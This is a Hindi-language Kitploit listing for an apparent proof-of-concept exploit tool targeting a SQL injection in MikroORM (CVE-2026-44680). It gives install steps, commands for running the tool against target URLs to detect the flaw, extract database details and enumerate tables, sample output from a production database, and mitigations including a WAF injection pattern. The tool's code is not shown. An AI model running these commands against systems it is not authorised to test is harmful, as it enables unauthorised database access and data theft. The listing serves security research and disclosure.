Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework — CVE-2026-44680 को प्रभावित करने वाले MikroORM ≤7.0.13 के लिए PoC टूल। JSON पाथ इंजेक्शन का शोषण करके UNION-आधारित हमलों के माध्यम से डेटाबेस सामग्री निकालता है। इसमें भेद्यता पहचान, स्वचालित डेटा निष्कर्षण, तालिका गणना और ब्लाइंड इंजेक्शन समर्थन शामिल है। Burp Suite के लिए प्रॉक्सी एकीकरण और WAF बायपास तकनीकें शामिल हैं। | Kitploit
उपकरण
/
GitHubGitHub
/cerberusmrxi
/cve-2026-44680-mikroorm-sql-injection-exploit-framework
भेद्यता परीक्षण फ्रेमवर्कभेद्यता स्कैनरकोड विश्लेषणशोषणवेब सुरक्षाडेटाबेस सुरक्षा
GitHubcerberusmrxi/cve-2026-44680-mikroorm-sql-injection-exploit-framework

CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework

रिपॉजिटरी देखें
11 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

CVE-2026-44680 को प्रभावित करने वाले MikroORM ≤7.0.13 के लिए PoC टूल। JSON पाथ इंजेक्शन का शोषण करके UNION-आधारित हमलों के माध्यम से डेटाबेस सामग्री निकालता है। इसमें भेद्यता पहचान, स्वचालित डेटा निष्कर्षण, तालिका गणना और ब्लाइंड इंजेक्शन समर्थन शामिल है। Burp Suite के लिए प्रॉक्सी एकीकरण और WAF बायपास तकनीकें शामिल हैं।

साझा करें

CVE-2026-44680 - MikroORM SQL इंजेक्शन एक्सप्लॉइट फ्रेमवर्क

Python Version License Status CVSS

सुरक्षा शोधकर्ताओं के लिए व्यावसायिक प्रूफ-ऑफ-कॉन्सेप्ट टूल


🔍 अवलोकन

CVE-2026-44680 MikroORM को प्रभावित करने वाली एक गंभीर SQL इंजेक्शन भेद्यता है, जो Node.js के लिए एक लोकप्रिय TypeScript ORM है। यह एक्सप्लॉइट फ्रेमवर्क सुरक्षा शोधकर्ताओं और पैठ परीक्षकों को भेद्यता का पता लगाने और उसका दोहन करने के लिए एक व्यावसायिक टूल प्रदान करता है।

लेखक: Sudeepa Wanigarathna
संस्करण: 1.0.0
वर्गीकरण: व्यावसायिक सुरक्षा अनुसंधान उपकरण


🚨 भेद्यता विवरण

विशेषतामान
CVE IDCVE-2026-44680
CVSS स्कोर7.6 (उच्च)
हमला वेक्टरनेटवर्क
हमले की जटिलतानिम्न
आवश्यक विशेषाधिकारनिम्न

प्रभावित संस्करण

  • @mikro-orm/knex <= 6.6.13
  • @mikro-orm/sql <= 7.0.13

मूल कारण

MikroORM JSON_EXTRACT क्वेरी बनाते समय रनटाइम-नियंत्रित JSON पाथ कुंजियों को सही ढंग से एस्केप करने में विफल रहता है। हमलावर JSON पाथ संदर्भ से बाहर निकलकर मनमाना SQL कोड इंजेक्ट कर सकते हैं।


✨ विशेषताएँ

विशेषताविवरणस्थिति
भेद्यता का पता लगानासमय-आधारित और त्रुटि-आधारित पहचान✅
डेटाबेस निष्कर्षणसंस्करण, डेटाबेस, उपयोगकर्ता, होस्टनाम✅
तालिका गणनासभी तालिकाओं की स्वतः खोज✅
UNION-आधारित इंजेक्शनUNION SELECT के माध्यम से डेटा निकालना✅
ब्लाइंड इंजेक्शनबूलियन-आधारित वर्ण निष्कर्षण✅
प्रॉक्सी समर्थनBurp Suite / इंटरसेप्टिंग प्रॉक्सी✅
रिपोर्ट निर्माणव्यावसायिक TXT रिपोर्ट✅
WAF बाईपासउन्नत अस्पष्टीकरण तकनीकें✅

📦 स्थापना

पूर्वापेक्षाएँ

root@kitploit:~
# Python 3.8 or higher
python3 --version

# pip package manager
pip --version

स्थापना चरण

चरण 1: रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/CerberusMrXi/CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework
cd CVE-2026-44680-exploit

चरण 2: निर्भरताएँ स्थापित करें

root@kitploit:~
# Using requirements.txt
pip install -r requirements.txt

# Or install manually
pip install requests colorama tqdm urllib3 simplejson

चरण 3: स्थापना सत्यापित करें

root@kitploit:~
python exploit.py --help

requirements.txt

root@kitploit:~
requests>=2.31.0
colorama>=0.4.6
tqdm>=4.65.0
urllib3>=2.0.0
simplejson>=3.19.0

🚀 त्वरित आरंभ

बुनियादी उपयोग

root@kitploit:~
# Full exploitation
python exploit.py -u http://localhost:3000

# Vulnerability detection only
python exploit.py -u http://target.com --detect

# Extract database information
python exploit.py -u http://target.com --extract

# Enumerate tables
python exploit.py -u http://target.com --enumerate

📖 उपयोग गाइड

कमांड विकल्प

फ्लैगविवरणडिफ़ॉल्ट
-u, --urlलक्ष्य URL (आवश्यक)-
-e, --endpointAPI एंडपॉइंट/api/users/search
-p, --proxyHTTP प्रॉक्सीकोई नहीं
-v, --verboseविस्तृत आउटपुटअसत्य
--detectकेवल भेद्यता का पता लगाएंअसत्य
--extractडेटाबेस जानकारी निकालेंअसत्य
--enumerateतालिकाओं की गणना करेंअसत्य
--blindब्लाइंड इंजेक्शन मोडअसत्य

उदाहरण कमांड

1. पूर्ण एक्सप्लॉइटेशन

root@kitploit:~
python exploit.py -u http://192.168.1.100:3000

2. कस्टम एंडपॉइंट

root@kitploit:~
python exploit.py -u http://target.com -e /api/v2/users/query

3. प्रॉक्सी के साथ (Burp Suite)

root@kitploit:~
python exploit.py -u http://target.com -p http://127.0.0.1:8080

4. विस्तृत डिबगिंग

root@kitploit:~
python exploit.py -u http://target.com -v --extract

5. ब्लाइंड इंजेक्शन

root@kitploit:~
python exploit.py -u http://target.com --blind

6. केवल पहचान

root@kitploit:~
python exploit.py -u http://target.com --detect

7. डेटाबेस जानकारी निकालें

root@kitploit:~
python exploit.py -u http://target.com --extract

8. तालिकाओं की गणना करें

root@kitploit:~
python exploit.py -u http://target.com --enumerate

📊 आउटपुट उदाहरण

कंसोल आउटपुट

root@kitploit:~
============================================================
  MikroORM CVE-2026-44680 Exploitation Framework
  Author: Sudeepa Wanigarathna
============================================================

[*] Performing vulnerability detection on /api/users/search
[+] Vulnerable to time-based SQL injection

[+] Vulnerability confirmed!

[*] Extracting database information...
[*] Enumerating tables...
[+] Found table: users
[+] Found table: products
[+] Found table: orders
[+] Found table: payments
[+] Found table: admin

===== MIKROORM CVE-2026-44680 EXPLOITATION REPORT =====
Author: Sudeepa Wanigarathna (Security Researcher)
Date: 2026-07-20 14:30:45
Target: http://localhost:3000

[*] VULNERABILITY DETAILS
    - CVE: CVE-2026-44680
    - CVSS Score: 7.6 (High)
    - Affected Components: @mikro-orm/knex <= 6.6.13

[*] DATABASE INFORMATION
    - Version: 10.11.6-MariaDB
    - Database: production_db
    - User: root@localhost
    - Hostname: localhost

[*] ENUMERATED TABLES (5 found)
    1. users
    2. products
    3. orders
    4. payments
    5. admin

[+] Report saved to exploit_report_1742493645.txt
[+] Table list saved to tables_1742493645.txt

जनरेट की गई फ़ाइलें

root@kitploit:~
exploit_report_1742493645.txt  # Complete exploitation report
tables_1742493645.txt          # List of discovered tables

🛡️ शमन

तत्काल कार्रवाई

1. MikroORM अपडेट करें

root@kitploit:~
npm install @mikro-orm/knex@latest
npm install @mikro-orm/sql@latest

2. इनपुट सत्यापन

root@kitploit:~
const ALLOWED_JSON_PATHS = ['$.email', '$.name', '$.metadata'];

function validateJsonPath(key) {
    if (!ALLOWED_JSON_PATHS.includes(key)) {
        throw new Error('Invalid JSON path');
    }
    return key;
}

3. WAF नियम

root@kitploit:~
# Block suspicious JSON path patterns
"filterField": "\$\.x'\) OR .* -- "

4. डेटाबेस सुदृढ़ीकरण

  • न्यूनतम विशेषाधिकार सिद्धांत लागू करें
  • अलग डेटाबेस उपयोगकर्ताओं का उपयोग करें
  • क्वेरी लॉगिंग लागू करें
  • SQL इंजेक्शन पहचान सक्षम करें

⚠️ अस्वीकरण

महत्वपूर्ण: यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है।

कानूनी सूचना

  • ✅ किसी भी सिस्टम का परीक्षण करने से पहले स्पष्ट अनुमति होना अनिवार्य है
  • ✅ आप जिम्मेदार हैं दुरुपयोग से हुई किसी भी क्षति के लिए
  • ✅ नैतिक रूप से उपयोग करें और भेद्यताओं की जिम्मेदारी से रिपोर्ट करें

नैतिक उपयोग दिशानिर्देश

  1. प्राधिकरण: सिस्टम स्वामी से लिखित अनुमति प्राप्त करें
  2. रिपोर्टिंग: निष्कर्षों की जिम्मेदारी से प्रभावित विक्रेताओं को रिपोर्ट करें
  3. गोपनीयता: पैच होने तक भेद्यताओं का खुलासा न करें
  4. सीमाएँ: अधिकृत परीक्षण के दायरे में रहें

📄 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है।

root@kitploit:~
MIT License

Copyright (c) 2026 Sudeepa Wanigarathna

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
...

📚 संदर्भ

  • CVE-2026-44680 विवरण
  • MikroORM सुरक्षा सलाह
  • OWASP SQL इंजेक्शन रोकथाम

सुरक्षा अनुसंधान समुदाय के लिए ❤️ के साथ बनाया गया

बग रिपोर्ट करें • फीचर अनुरोध करें • GitHub पर स्टार करें

टूल डाउनलोड करें